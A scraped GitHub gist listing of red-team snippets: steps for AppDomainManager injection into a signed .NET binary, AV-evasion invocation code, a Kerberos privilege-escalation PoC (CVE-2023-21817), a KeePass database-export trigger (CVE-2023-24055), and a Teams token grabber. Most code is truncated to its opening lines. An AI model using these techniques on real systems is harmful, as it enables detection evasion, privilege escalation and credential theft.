GhostLoader Steps :)
1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
mgeeky
/ _Instructions_Reproduce.md
Created
June 6, 2023 21:10
— forked from leoloobeek/_Instructions_Reproduce.md
GhostLoader - AppDomainManager - Injection - 攻壳机动队
mgeeky
/ _notes.md
Created
June 6, 2023 21:09
— forked from djhohnstein/_notes.md
AppDomainManager Injection
We can do this by experimenting with .config files.
Many defenders catch/detect files that are renamed, they do this by matching Original Filename to Process Name
In this example, we don't have to rename anything. We simple coerce a trusted signed app to load our Assembly.
We do this by directing the application to read a config file we provide.
mgeeky
/ HInvoke.cs
Created
May 18, 2023 00:18
— forked from dr4k0nia/HInvoke.cs
A very minimalistic approach of calling .net runtime functions or accessing properties using only hashes as identifiers. It does not leave any strings or import references since we dynamically resolve the required member from the mscorlib assembly on runtime. Read the blog post: https://dr4k0nia.github.io/dotnet/coding/2022/08/10/HInvoke-and-avo…
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System.Linq; | |
| using System.Reflection; | |
| namespace HashInvoke; | |
| public class HInvoke | |
| { | |
| public static T InvokeMethod<T>(uint classID, uint methodID, object[]? args = null) | |
| { | |
| // Get the System assembly and go trough all its types hash their name |
mgeeky
/ Source.cpp
Created
May 9, 2023 22:12
— forked from alfarom256/Source.cpp
Thread Execution via NtCreateWorkerFactory
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <winternl.h> | |
| #include <stdio.h> | |
| #define WORKER_FACTORY_FULL_ACCESS 0xf00ff | |
| // https://github.com/winsiderss/systeminformer/blob/17fb2e0048f062a04394c4ccd615b611e6ffd45d/phnt/include/ntexapi.h#LL1096C1-L1115C52 | |
| typedef enum _WORKERFACTORYINFOCLASS | |
| { | |
| WorkerFactoryTimeout, // LARGE_INTEGER |
mgeeky
/ urbandoor.cs
Created
April 11, 2023 08:23
— forked from monoxgas/urbandoor.cs
Minimal PoC code for Kerberos Unlock LPE (CVE-2023-21817)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using NtApiDotNet; | |
| using NtApiDotNet.Ndr.Marshal; | |
| using NtApiDotNet.Win32; | |
| using NtApiDotNet.Win32.Rpc.Transport; | |
| using NtApiDotNet.Win32.Security.Authentication; | |
| using NtApiDotNet.Win32.Security.Authentication.Kerberos; | |
| using NtApiDotNet.Win32.Security.Authentication.Kerberos.Client; | |
| using NtApiDotNet.Win32.Security.Authentication.Kerberos.Server; | |
| using NtApiDotNet.Win32.Security.Authentication.Logon; | |
| using System; |
mgeeky
/ adodb_stream_for_hta.js
Created
March 6, 2023 19:05
— forked from rndomhack/adodb_stream_for_hta.js
Create ADODB.Stream object for HTA (mode IE9, IE10)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var fso = new ActiveXObject("Scripting.FileSystemObject"); | |
| var ado = (function() { | |
| if (typeof window === "undefined") { | |
| return new ActiveXObject("ADODB.Stream"); | |
| } else { | |
| var _GetObject = (typeof GetObject === "function") ? GetObject : (function() { | |
| var script = window.document.createElement("script"); | |
| script.setAttribute("language", "VBScript"); | |
| script.innerHTML = "Function GetObjectHelper(name)\nSet GetObjectHelper = GetObject(name)\nEnd Function"; | |
| window.document.body.appendChild(script); |
mgeeky
/ loadlibrary_system.c
Created
March 2, 2023 17:57
— forked from rossy/loadlibrary_system.c
Safe LoadLibrary for DLLs that are expected to be in system32
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <wchar.h> | |
| #define LOAD_LIBRARY_SEARCH_SYSTEM32 (0x00000800) | |
| HMODULE loadlibrary_system(const wchar_t* name) | |
| { | |
| /* If running on Windows 8 or a system with KB2533623, LoadLibraryEx with | |
| LOAD_LIBRARY_SEARCH_SYSTEM32 does the right thing */ | |
| if (GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "AddDllDirectory")) |
mgeeky
/ KeePass-Export-Trigger.xml
Last active
January 26, 2023 19:33
KeePass Export Database Trigger XML - aka CVE-2023-24055 aka KeeThief . Insert this XML into %APPDATA%\Roaming\KeePass\KeePass.config.xml
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <TriggerCollection | |
| xmlns:xsd="http://www.w3.org/2001/XMLSchema" | |
| xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> | |
| <Triggers> | |
| <Trigger> | |
| <Guid>Ab8CqzeKQUuKdzTx4tKy7A==</Guid> | |
| <Name>Debug</Name> | |
| <Events> | |
| <Event> | |
| <TypeGuid>5f8TBoW4QYm5BvaeKztApw==</TypeGuid> |
mgeeky
/ msteams-token.js
Created
January 12, 2023 00:47
— forked from X-C3LL/msteams-token.js
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Obtain teams token - you can reuse it for GoMapEnum for example | |
| // Author: Juan Manuel Fernandez (@TheXC3LL) | |
| const puppeteer = require('puppeteer'); | |
| (async () => { | |
| console.log("\t\tMS Teams Token Generator - @TheXC3LL\n\n"); | |
| const username = process.argv[2]; | |
| const password = process.argv[3]; | |
| console.log("[*] Using credentials: %s:%s", username, password); |
mgeeky
/ FreshyCalls-VBA.vba
Created
January 12, 2023 00:44
— forked from X-C3LL/FreshyCalls-VBA.vba
Retrieving SSN for syscalling in VBA following FreshyCalls technique
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' Proof of Concept: retrieving SSN for syscalling in VBA | |
| ' Author: Juan Manuel Fernandez (@TheXC3LL) | |
| 'Based on: | |
| 'https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/ | |
| 'https://www.crummie5.club/freshycalls/ | |
| Private Type LARGE_INTEGER |